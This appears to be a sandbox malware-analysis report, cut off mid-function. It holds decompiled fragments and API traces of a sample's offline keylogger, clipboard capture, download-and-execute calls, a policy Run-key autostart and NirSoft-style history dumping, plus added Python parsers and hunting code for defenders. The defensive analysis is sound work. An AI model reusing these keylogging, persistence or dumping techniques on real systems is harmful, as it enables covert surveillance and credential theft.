                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E10595E1B(void* __edi, intOrPtr _a4) {
                    				struct _SYSTEMTIME _v24;
                    				char _v48;
                    				char _v72;
                    				void* __ebx;
                    				intOrPtr _t85;
                    				void* _t86;
                    
                    				_t84 = __edi;
                    				if( *0x46c7d0 == 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				_t85 = _a4;
                    				if( *0x46bb03 == 0) {
                    					L7:
                    					 *0x46c7e0 =  *0x46c7e0 & 0x00000000;
                    					 *0x46c7e5 = 1;
                    					 *0x46c7dc = _t85;
                    					return 1;
                    				}
                    				_t91 =  *0x46c7e4;
                    				if( *0x46c7e4 != 0) {
                    					GetLocalTime( &_v24);
                    					_push(_v24.wMilliseconds & 0x0000ffff);
                    					_push(_v24.wSecond & 0x0000ffff);
                    					_push(_v24.wMinute & 0x0000ffff);
                    					E1059569C(_t91, E10592E03(E105961B1(0x45f5ec,  &_v48, E10592EF2(0x45f5ec,  &_v72, 0x45f5ec), __edi, _t91, 0x45f5cc)), _v24.wHour & 0x0000ffff);
                    					E10592E35();
                    					E10592E35();
                    					_push(_t85);
                    					_push(_v24.wMilliseconds & 0x0000ffff);
                    					_push(_v24.wSecond & 0x0000ffff);
                    					_push(_v24.wMinute & 0x0000ffff);
                    					E1059569C(_t91, E10592E03(E105961B1(0x45f5ec,  &_v72, E10592EF2(0x45f5ec,  &_v48, 0x45f5ec), __edi, _t91, 0x45f608)), _v24.wHour & 0x0000ffff);
                    					_t86 = _t86 + 0x2c;
                    					E10592E35();
                    					E10592E35();
                    					 *0x46c7e4 = 0;
                    				}
                    				if( *0x46c7dc != _t85) {
                    					_t93 =  *0x46c7e5;
                    					if( *0x46c7e5 != 0) {
                    						GetLocalTime( &_v24);
                    						_push(_t85);
                    						_push(_v24.wMilliseconds & 0x0000ffff);
                    						_push(_v24.wSecond & 0x0000ffff);
                    						_push(_v24.wMinute & 0x0000ffff);
                    						E1059569C(_t93, E10592E03(E105961B1(0x45f5ec,  &_v72, E10592EF2(0x45f5ec,  &_v48, 0x45f5ec), _t84, _t93, 0x45f62c)), _v24.wHour & 0x0000ffff);
                    						E10592E35();
                    						E10592E35();
                    					}
                    				}
                    				goto L7;
                    			}


                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: %02i:%02i:%02i:%03i [Info]
                    • API String ID: 481472006-1582603680
                    • Opcode ID: c002146ff835f1101febd2b3f3f9689e7bbfa51cf604b73ba2f29748fc1e801f
                    • Instruction ID: c658bcdfb133b95ab966972e778edcba56b15d1dacd2939b8252fe4f6b52d582
                    • Opcode Fuzzy Hash: c002146ff835f1101febd2b3f3f9689e7bbfa51cf604b73ba2f29748fc1e801f
                    • Instruction Fuzzy Hash: 0F41B5B6C00148AACB00DBB4DC89AFEBBBCDB5C346F504066F841E6191FB386A49D765
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404167
                      • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                      • Part of subcall function 0041432B: CloseHandle.KERNEL32( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
                      • Part of subcall function 0041432B: CloseHandle.KERNEL32(?), ref: 0041434A
                      • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                    • Sleep.KERNEL32(000000FA,0045F464), ref: 00404239
                    Strings
                    • /sort "Visit Time" /stext ", xrefs: 004041B3
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                    • String ID: /sort "Visit Time" /stext "
                    • API String ID: 368326130-1573945896
                    • Opcode ID: 180c380c2922e39affd1277b0cb4d4a90a6e5fdee3d97fa11ebe90aea9bbed14
                    • Instruction ID: 7061a5f3a0732a34bedf69b2f97f4882e16be89ee39d0e7819724232ed9fbdaa
                    • Opcode Fuzzy Hash: 180c380c2922e39affd1277b0cb4d4a90a6e5fdee3d97fa11ebe90aea9bbed14
                    • Instruction Fuzzy Hash: CB316371A102185BCB14FAB5DC969EE77769F90308F40007FB906775E2EF38194ACA99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0042F49E: __onexit.LIBCMT ref: 0042F4A4
                    • __Init_thread_footer.LIBCMT ref: 00409C64
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer__onexit
                    • String ID: [End of clipboard]$[Text copied to clipboard]
                    • API String ID: 1881088180-3686566968
                    • Opcode ID: ece6e36ffa962d19449e2b0787c4a54564b40f9831cee9b3f8d6904f1f792cc1
                    • Instruction ID: 3d06db49f43303a05e4c8f32813a3e66390e02e7d5a4e21382efde84428f3d7c
                    • Opcode Fuzzy Hash: ece6e36ffa962d19449e2b0787c4a54564b40f9831cee9b3f8d6904f1f792cc1
                    • Instruction Fuzzy Hash: 6621A231A101088ACB14FBA5D9929EEB379AF54314F50017FF902771D3EF386D4A869D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044A012,?,00000050,?,?,?,?,?), ref: 00449E92
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ACP$OCP
                    • API String ID: 0-711371036
                    • Opcode ID: 83047d10c1cb2af2f865f0400f74a2dfdf605a72ce1efc873ea23dd6a869fcf3
                    • Instruction ID: 629df3418df93450f9fa2fa803e099c9df1f2dc0fc1cc2c13268e355a6833585
                    • Opcode Fuzzy Hash: 83047d10c1cb2af2f865f0400f74a2dfdf605a72ce1efc873ea23dd6a869fcf3
                    • Instruction Fuzzy Hash: D421FB63A00100A6FB34CF65C901B9773AADB64B51F76442AE909D7385EB3ADD01E358
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Sleep.KERNEL32(00000064), ref: 00412A88
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 00412AEA
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: DownloadFileSleep
                    • String ID: 8E@
                    • API String ID: 1931167962-787191786
                    • Opcode ID: 3410a5c9f82c25c8ba3a4d0fdb73f71bcee90e7852e91e14cb60bb03a2b14178
                    • Instruction ID: 026e37eaac6a7f0be5a6f47ff2f6c220693f67fdfc1424ac955b23e6f862d316
                    • Opcode Fuzzy Hash: 3410a5c9f82c25c8ba3a4d0fdb73f71bcee90e7852e91e14cb60bb03a2b14178
                    • Instruction Fuzzy Hash: 661186715043015BD614FF72D8569BF7399AF54309F00083FF946A61E2EF389948C65A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E1059A417(void* __ebx, struct HHOOK__** __ecx) {
                    				char _v28;
                    				void* __edi;
                    				struct HHOOK__** _t27;
                    				void* _t28;
                    
                    				_t17 = __ebx;
                    				_t27 = __ecx;
                    				if( *((char*)(__ecx + 0x49)) == 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				_t33 =  *0x46a9d4 - 0x32;
                    				if( *0x46a9d4 != 0x32) {
                    					E10592EF2(__ebx,  &_v28, 0x45fa10);
                    					_t28 = _t28 - 0x18;
                    					E105A8148(_t28,  &_v28);
                    					E1059A4A2(__ebx, _t27, _t33);
                    					E10592E35();
                    				}
                    				_t29 = _t28 - 0x18;
                    				E10592EF2(_t17, _t28 - 0x18, 0x45fa10);
                    				E10592EF2(_t17, _t29 - 0x18, "[Info]");
                    				E105A7AEE(_t17, 0x45fa10);
                    				_t27[0x12] = 0;
                    				if(_t27[0x12] == 0 &&  *_t27 != 0) {
                    					UnhookWindowsHookEx( *_t27);
                    					 *_t27 =  *_t27 & 0x00000000;
                    				}
                    				return 1;
                    			}


                    APIs
                    • UnhookWindowsHookEx.USER32(?), ref: 1059A48D
                      • Part of subcall function 1059A4A2: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 1059A4B0
                      • Part of subcall function 1059A4A2: wsprintfW.USER32 ref: 1059A531
                      • Part of subcall function 1059A4A2: SetEvent.KERNEL32(00000000,00000000), ref: 1059A55B
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: EventHookLocalTimeUnhookWindowswsprintf
                    • String ID: Offline Keylogger Stopped$[Info]
                    • API String ID: 2949427887-1791908007
                    • Opcode ID: a4d57ab4f8787b26c13e567e1f848d4a2bb0d4328440e5da0fea6a2577d30637
                    • Instruction ID: d53c78ef6e602ee70b3b2dbbd6e94c13c1eee6887f05367a8067b2bf3f7140c0
                    • Opcode Fuzzy Hash: a4d57ab4f8787b26c13e567e1f848d4a2bb0d4328440e5da0fea6a2577d30637
                    • Instruction Fuzzy Hash: 3D01FC35A0421056DF227734CC0F7BE7FA5DBD2291F40045DD846121D2DBE519AAD7E3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • UnhookWindowsHookEx.USER32(?), ref: 0040961F
                      • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                      • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                      • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: EventHookLocalTimeUnhookWindowswsprintf
                    • String ID: Offline Keylogger Stopped$[Info]
                    • API String ID: 2949427887-1791908007
                    • Opcode ID: 401e296d5ca654c2970b2b3bb8dcd657e39c2b4926fc386e29e92b6c915f74fd
                    • Instruction ID: 9efaed4a8ef81a290ad5d268e4fe3922035fbc03e5cccf55ce25ae16395c1a9d
                    • Opcode Fuzzy Hash: 401e296d5ca654c2970b2b3bb8dcd657e39c2b4926fc386e29e92b6c915f74fd
                    • Instruction Fuzzy Hash: 0D01B531A0460157DB297729D80B7BE7BA54B42305F44057FD981222D3EABE0D5AC7DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsValidLocale.KERNEL32(00000000,?C,00000000,00000001,?,?,0043E33F,?,?,0043DD1F,?,00000004), ref: 004425FF
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: LocaleValid
                    • String ID: ?C$IsValidLocaleName
                    • API String ID: 1901932003-3626571907
                    • Opcode ID: d1d8c5253a1af981cfd3e37de039cb3b4bc27b4a035ec99b902d66c65b304dd4
                    • Instruction ID: 0f43182f0e06842afc615407eccca0477f3e303412cdda621fdba0a01c3862c5
                    • Opcode Fuzzy Hash: d1d8c5253a1af981cfd3e37de039cb3b4bc27b4a035ec99b902d66c65b304dd4
                    • Instruction Fuzzy Hash: 92F05230680718B7DB216F209C02FAEBB64DB04B52F90402BFC016B2C2DEBD5E05958D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetKeyState.USER32(00000011), ref: 00409B16
                      • Part of subcall function 004089BA: GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089EE
                      • Part of subcall function 004089BA: GetWindowThreadProcessId.USER32(00000000,?), ref: 004089F9
                      • Part of subcall function 004089BA: GetKeyboardLayout.USER32(00000000), ref: 00408A00
                      • Part of subcall function 004089BA: GetKeyState.USER32(00000010), ref: 00408A0A
                      • Part of subcall function 004089BA: GetKeyboardState.USER32(?), ref: 00408A17
                      • Part of subcall function 004089BA: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A33
                      • Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                    • String ID: [AltL]$[AltR]
                    • API String ID: 3195419117-2658077756
                    • Opcode ID: 233eeff81a11d1e0ef41f110e07776e11a9ad604124f7dffc3698ee59377735f
                    • Instruction ID: 2a395f7e7ec9595130e68cde229813fbdc3430fa116e23059516ea087cae5920
                    • Opcode Fuzzy Hash: 233eeff81a11d1e0ef41f110e07776e11a9ad604124f7dffc3698ee59377735f
                    • Instruction Fuzzy Hash: 57E0652130062197C858363E7A2B76E3C219B827B5B40016FF9866B6C7DD7EAD4543CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00412795
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell
                    • String ID: 8E@$open
                    • API String ID: 587946157-2601783919
                    • Opcode ID: 4a174233fad1308712026915405e2748d4c3bbd23a7c6193313af7554f161b63
                    • Instruction ID: a3a45966c527cb9039505bdf36bed85c4dc8a7f97c1c46fe52c99c9ff6feb995
                    • Opcode Fuzzy Hash: 4a174233fad1308712026915405e2748d4c3bbd23a7c6193313af7554f161b63
                    • Instruction Fuzzy Hash: 86E092712083445BD204FA72DC81EBFB398AB50309F00083FB906A10E2EF385D0C866A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetKeyState.USER32(00000012), ref: 00409B70
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: State
                    • String ID: [CtrlL]$[CtrlR]
                    • API String ID: 1649606143-2446555240
                    • Opcode ID: 64742ad456815e448cec770cc028005fb44021ec5766c216196dc85abf317472
                    • Instruction ID: c7d76ad8b2f91347b64eca3d28aa0764e40cca804d3340b3ca60eca204a5aa27
                    • Opcode Fuzzy Hash: 64742ad456815e448cec770cc028005fb44021ec5766c216196dc85abf317472
                    • Instruction Fuzzy Hash: 61E048212102115BC514353AA61A67939209741775B40013FE982AB5C7C96F6D1542CB
                    Uniqueness

                    Uniqueness Score: -1.00%
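
                    The keylogger code paths above give the pieces of this sample's offline keylog format: the timestamp format string "%02i:%02i:%02i:%03i [Info]" that E10595E1B fills from GetLocalTime, the "Offline Keylogger Started"/"Offline Keylogger Stopped" session markers, the "[Text copied to clipboard]"/"[End of clipboard]" clipboard delimiters, and the "[AltL]", "[AltR]", "[CtrlL]" and "[CtrlR]" modifier tokens. The Python parser below is an added example for triaging a recovered log; it is not code from the sample, from this report or from Joe Sandbox. That the event message follows the timestamp prefix on the same line, that untimestamped lines carry raw keystroke data, and the sample log itself are assumptions constructed for the example (the other format strings referenced by E10595E1B are not reproduced on this page).

```python
"""Added example: parse the timestamped offline-keylogger output whose pieces
appear in this report (not sample, report or Joe Sandbox code)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Timestamp prefix from the format string "%02i:%02i:%02i:%03i [Info]" in E10595E1B
# (local hour:minute:second:millisecond from GetLocalTime). ASSUMPTION for this example:
# the event message follows the prefix on the same line.
_TS_RE = re.compile(r"^(\d{2}):(\d{2}):(\d{2}):(\d{3}) \[Info\] ?(.*)$")

# String constants visible in the keylogger code paths of the report.
SESSION_START = "Offline Keylogger Started"
SESSION_STOP = "Offline Keylogger Stopped"
CLIP_START = "[Text copied to clipboard]"
CLIP_END = "[End of clipboard]"
MODIFIER_TOKENS = ("[AltL]", "[AltR]", "[CtrlL]", "[CtrlR]")
_TOKEN_RE = re.compile(r"\[(?:Alt|Ctrl)[LR]\]")


@dataclass
class Event:
    ms_of_day: int   # milliseconds since local midnight; -1 when the line had no timestamp
    kind: str        # "session_start" | "session_stop" | "clipboard" | "keys" | "info"
    text: str


def _ms_of_day(h: str, m: str, s: str, ms: str) -> int:
    return ((int(h) * 60 + int(m)) * 60 + int(s)) * 1000 + int(ms)


def split_modifiers(keys: str) -> Tuple[str, List[str]]:
    """Separate typed characters from the bracketed modifier tokens the logger injects."""
    return _TOKEN_RE.sub("", keys), _TOKEN_RE.findall(keys)


def parse_keylog(text: str) -> List[Event]:
    events: List[Event] = []
    clip: Optional[List[str]] = None   # lines collected while inside a clipboard block
    clip_ts = -1
    for line in text.splitlines():
        if clip is not None:
            if CLIP_END in line:
                events.append(Event(clip_ts, "clipboard", "\n".join(clip)))
                clip = None
            else:
                clip.append(line)
            continue
        m = _TS_RE.match(line)
        ts, msg = (_ms_of_day(*m.groups()[:4]), m.group(5)) if m else (-1, line)
        if msg == SESSION_START:
            events.append(Event(ts, "session_start", msg))
        elif msg == SESSION_STOP:
            events.append(Event(ts, "session_stop", msg))
        elif msg.startswith(CLIP_START):
            clip, clip_ts = [], ts
            rest = msg[len(CLIP_START):].strip()
            if rest:
                clip.append(rest)
        elif m:
            events.append(Event(ts, "info", msg))
        elif line:
            # ASSUMPTION: untimestamped lines are raw keystroke data; consecutive ones are joined.
            if events and events[-1].kind == "keys":
                events[-1].text += line
            else:
                events.append(Event(-1, "keys", line))
    return events


def session_windows(events: List[Event]) -> List[Tuple[int, int]]:
    """Pair each Started marker with the next Stopped marker (stop is -1 if never seen)."""
    windows, start = [], None
    for ev in events:
        if ev.kind == "session_start":
            start = ev.ms_of_day
        elif ev.kind == "session_stop" and start is not None:
            windows.append((start, ev.ms_of_day))
            start = None
    if start is not None:
        windows.append((start, -1))
    return windows


# Constructed sample input (not from the analysed sample), laid out per the assumptions above.
SAMPLE_LOG = """09:15:02:117 [Info] Offline Keylogger Started
hunter2[AltL]
[CtrlL]v
09:15:20:009 [Info] [Text copied to clipboard]
secret line 1
secret line 2
[End of clipboard]
09:16:00:555 [Info] Offline Keylogger Stopped
"""

if __name__ == "__main__":
    for ev in parse_keylog(SAMPLE_LOG):
        print(ev.ms_of_day, ev.kind, repr(ev.text))
    print(session_windows(parse_keylog(SAMPLE_LOG)))
```

                    The clipboard block is collected verbatim between the two delimiters so that multi-line pastes are not mistaken for keystrokes, and split_modifiers lets an analyst read the typed text with the "[CtrlL]"-style tokens set aside while still keeping them for reconstructing shortcuts such as paste.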

                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,0046C500,80000002,?,0040AE30,00000000,?,0046C518,0046C500), ref: 00410D6A
                    • RegDeleteValueW.ADVAPI32(0046C500,0046C518,?,0040AE30,00000000,?,0046C518,0046C500), ref: 00410D7E
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00410D68
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: DeleteOpenValue
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                    • API String ID: 2654517830-1051519024
                    • Opcode ID: 4fad1368e3560850efc42bff900c7ba9b40029ea3229a6a7c2dc80faaaf5e034
                    • Instruction ID: 75ebaf3219d9d67017fe3971026eac3f4578a9a4a068ccc2e26b180b3f179870
                    • Opcode Fuzzy Hash: 4fad1368e3560850efc42bff900c7ba9b40029ea3229a6a7c2dc80faaaf5e034
                    • Instruction Fuzzy Hash: D1E0C231284308BBEF104FB1EC07FFA772CEB01F42F1002A5B90692091C666DB549664
                    Uniqueness

                    Uniqueness Score: -1.00%
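
                    Two of the API blocks above point at host artefacts worth checking on a suspected infection: the RegOpenKeyExW (HKEY_LOCAL_MACHINE, 0x80000002) and RegDeleteValueW pair against Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, an autostart location that is rarely populated on a clean host, and the command-line fragment /sort "Visit Time" /stext ", which is the switch syntax of NirSoft's command-line dumpers writing their output to a text file. The Python below is an added example, not part of this report, of the sample or of Joe Sandbox; it runs both checks over constructed registry-export rows and process-creation records. The record shape, the HKCU variant of the key and the sample data are assumptions made for the example.

```python
"""Added example: hunt for two host artefacts recorded in this report
(not sample, report or Joe Sandbox code)."""
import re
from typing import Dict, Iterable, List

# Key the sample opens and deletes a value from (RegOpenKeyExW on HKLM, then RegDeleteValueW).
# ASSUMPTION: the HKCU twin is included because the same policy key exists per user.
POLICY_RUN_KEYS = (
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
)
_POLICY_RUN_LOWER = {k.lower() for k in POLICY_RUN_KEYS}

# '/stext <file>' writes a NirSoft tool's report to a text file; the path may be quoted or bare.
# '/sort "Visit Time"' is the exact sort switch seen in the report's command-line string.
_STEXT_RE = re.compile(r'/stext\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
_SORT_VISIT_RE = re.compile(r'/sort\s+"Visit Time"', re.IGNORECASE)


def suspicious_policy_run_values(reg_values: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """reg_values: rows of {"key", "name", "data"} as exported from the registry (ASSUMED shape)."""
    hits = []
    for row in reg_values:
        if row["key"].rstrip("\\").lower() in _POLICY_RUN_LOWER:
            hits.append(row)
    return hits


def nirsoft_style_dumps(process_events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """process_events: rows of {"image", "cmdline"} (Sysmon event 1 style, ASSUMED shape).
    Returns the dumping image, the text file it wrote, and whether it used the report's sort switch."""
    hits = []
    for ev in process_events:
        cmd = ev["cmdline"]
        m = _STEXT_RE.search(cmd)
        if not m:
            continue
        hits.append({
            "image": ev["image"],
            "out_path": m.group(1) if m.group(1) is not None else m.group(2),
            "sorted_by_visit_time": bool(_SORT_VISIT_RE.search(cmd)),
        })
    return hits


def triage(reg_values, process_events) -> Dict[str, list]:
    return {
        "policy_run_values": suspicious_policy_run_values(reg_values),
        "text_dumps": nirsoft_style_dumps(process_events),
    }


# Constructed sample data (not observations from the analysed sample).
SAMPLE_REGISTRY = [
    {"key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "SecurityHealth", "data": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    {"key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
     "name": "WinUpdate", "data": r"C:\Users\u\AppData\Roaming\svc\svc.exe"},
]
SAMPLE_PROCESSES = [
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"image": r"C:\Users\u\AppData\Local\Temp\bhv.exe",
     "cmdline": r'bhv.exe /sort "Visit Time" /stext "C:\Users\u\AppData\Local\Temp\hist.dat"'},
    {"image": r"C:\Users\u\AppData\Local\Temp\wb.exe",
     "cmdline": r"wb.exe /stext C:\Users\u\AppData\Local\Temp\pw.dat"},
]

if __name__ == "__main__":
    for section, rows in triage(SAMPLE_REGISTRY, SAMPLE_PROCESSES).items():
        print(section)
        for row in rows:
            print("  ", row)
```

                    The /stext match deliberately ignores the tool's file name: the sample's dropped helpers can be renamed freely, while the output-file switch has to stay for the dump to be collected, so the written path is the stable artefact to follow up on disk.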

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: wave$CloseStop
                    • String ID: 8E@
                    • API String ID: 3638528417-787191786
                    • Opcode ID: 1d3af16e672de4a25f439eee544860deda97f69f123fda986720eb11b6d204bc
                    • Instruction ID: 5a6495d9c5bf32114adb3f6aa644e01b82198ca3e6267900558c7952ddd75583
                    • Opcode Fuzzy Hash: 1d3af16e672de4a25f439eee544860deda97f69f123fda986720eb11b6d204bc
                    • Instruction Fuzzy Hash: CAE04F311182818BC311EF65E80569DB790FB51306F40053EE455D10F2EF354599DB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E105CBA26(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                    				char* _v8;
                    				int _v12;
                    				char _v16;
                    				char _v24;
                    				char _v28;
                    				void* __ebx;
                    				char _t34;
                    				int _t35;
                    				int _t38;
                    				long _t39;
                    				char* _t42;
                    				int _t44;
                    				int _t47;
                    				int _t53;
                    				intOrPtr _t55;
                    				void* _t56;
                    				char* _t57;
                    				char* _t62;
                    				char* _t63;
                    				void* _t64;
                    				int _t65;
                    				short* _t67;
                    				short* _t68;
                    				int _t69;
                    				intOrPtr* _t70;
                    
                    				_t64 = __edx;
                    				_t53 = _a12;
                    				_t67 = _a4;
                    				_t68 = 0;
                    				if(_t67 == 0) {
                    					L3:
                    					if(_a8 != _t68) {
                    						E105C6375(_t53,  &_v28, _t64, _a16);
                    						_t34 = _v24;
                    						__eflags = _t67;
                    						if(_t67 == 0) {
                    							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                    							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                    								_t69 = _t68 | 0xffffffff;
                    								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                    								__eflags = _t35;
                    								if(_t35 != 0) {
                    									L29:
                    									_t28 = _t35 - 1; // -1
                    									_t69 = _t28;
                    									L30:
                    									__eflags = _v16;
                    									if(_v16 != 0) {
                    										_t55 = _v28;
                    										_t31 = _t55 + 0x350;
                    										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                    										__eflags =  *_t31;
                    									}
                    									return _t69;
                    								}
                    								 *((intOrPtr*)(E105CB372())) = 0x2a;
                    								goto L30;
                    							}
                    							_t70 = _a8;
                    							_t56 = _t70 + 1;
                    							do {
                    								_t38 =  *_t70;
                    								_t70 = _t70 + 1;
                    								__eflags = _t38;
                    							} while (_t38 != 0);
                    							_t69 = _t70 - _t56;
                    							goto L30;
                    						}
                    						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                    						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                    							_t69 = _t68 | 0xffffffff;
                    							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                    							__eflags = _t35;
                    							if(_t35 != 0) {
                    								goto L29;
                    							}
                    							_t39 = GetLastError();
                    							__eflags = _t39 - 0x7a;
                    							if(_t39 != 0x7a) {
                    								L21:
                    								 *((intOrPtr*)(E105CB372())) = 0x2a;
                    								 *_t67 = 0;
                    								goto L30;
                    							}
                    							_t42 = _a8;
                    							_t57 = _t42;
                    							_v8 = _t57;
                    							_t65 = _t53;
                    							__eflags = _t53;
                    							if(_t53 == 0) {
                    								L20:
                    								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                    								__eflags = _t44;
                    								if(_t44 != 0) {
                    									_t69 = _t44;
                    									goto L30;
                    								}
                    								goto L21;
                    							} else {
                    								goto L15;
                    							}
                    							while(1) {
                    								L15:
                    								_t45 =  *_t57;
                    								_v12 = _t65 - 1;
                    								__eflags =  *_t57;
                    								if(__eflags == 0) {
                    									break;
                    								}
                    								_t47 = E105D5424(__eflags, _t45 & 0x000000ff,  &_v24);
                    								_t62 = _v8;
                    								__eflags = _t47;
                    								if(_t47 == 0) {
                    									L18:
                    									_t65 = _v12;
                    									_t57 = _t62 + 1;
                    									_v8 = _t57;
                    									__eflags = _t65;
                    									if(_t65 != 0) {
                    										continue;
                    									}
                    									break;
                    								}
                    								_t62 = _t62 + 1;
                    								__eflags =  *_t62;
                    								if( *_t62 == 0) {
                    									goto L21;
                    								}
                    								goto L18;
                    							}
                    							_t42 = _a8;
                    							goto L20;
                    						}
                    						__eflags = _t53;
                    						if(_t53 == 0) {
                    							goto L30;
                    						}
                    						_t63 = _a8;
                    						while(1) {
                    							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                    							__eflags =  *(_t68 + _t63);
